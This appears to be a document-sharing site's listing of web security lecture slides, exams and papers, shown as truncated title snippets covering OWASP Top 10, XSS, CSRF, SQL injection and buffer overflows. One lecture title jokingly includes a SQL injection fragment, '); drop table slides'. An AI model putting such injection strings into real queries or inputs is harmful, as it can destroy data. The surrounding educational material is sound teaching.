OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationWeb Security II. Slides from M. Hicks, University of Maryland
Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
More informationExcerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt
Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand
More informationWeb Security, Part 2
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationExploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationCS 161 Computer Security
Wagner Spring 2014 CS 161 Computer Security Midterm 1 Print your name:, (last) (first) I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that academic misconduct will be reported
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall 2011.
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2011 Quiz I: Solutions Please do not write in the boxes below. I (xx/20) II (xx/10) III (xx/16)
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationWe will focus on Buffer overflow attacks SQL injections. See book for other examples
We will focus on Buffer overflow attacks SQL injections See book for other examples Buffer overrun is another common term Buffer Overflow A condition at an interface under which more input can be placed
More informationSecurity and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web
Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationOWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP
OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationCS526: Information security
Cristina Nita-Rotaru CS526: Information security Readings for This Lecture Wikipedia } HTTP Cookie } Same Origin Policy } Cross Site Scripting } Cross Site Request Forgery 2 1: Background Background }
More informationCSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Threat model In these scenarios: The server is benign The client is malicious The client
More informationWeb Security: XSS; Sessions
Web Security: XSS; Sessions CS 161: Computer Security Prof. Raluca Ada Popa Mar 22, 2018 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh SQL Injection
More informationCIS 5373 Systems Security
CIS 5373 Systems Security Topic 5.2: Web Security Attacks Endadul Hoque Slide Acknowledgment Contents are based on slides from Cristina Nita-Rotaru (Northeastern) Wil Robertson (Northeastern) John Mitchell
More informationSoK: Eternal War in Memory
SoK: Eternal War in Memory László Szekeres, Mathias Payer, Tao Wei, Dawn Song Presenter: Wajih 11/7/2017 Some slides are taken from original S&P presentation 1 What is SoK paper? Systematization of Knowledge
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationChrome Extension Security Architecture
Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extension s security architecture
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationEthical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities
Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand
More informationI n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:
This time Continuing with Software Security Getting insane with I n p u t sanitization ); drop table slides New attacks and countermeasures: SQL injection Background on web architectures A very basic web
More information1 About Web Security. What is application security? So what can happen? see [?]
1 About Web Security What is application security? see [?] So what can happen? 1 taken from [?] first half of 2013 Let s focus on application security risks Risk = vulnerability + impact New App: http://www-03.ibm.com/security/xforce/xfisi
More information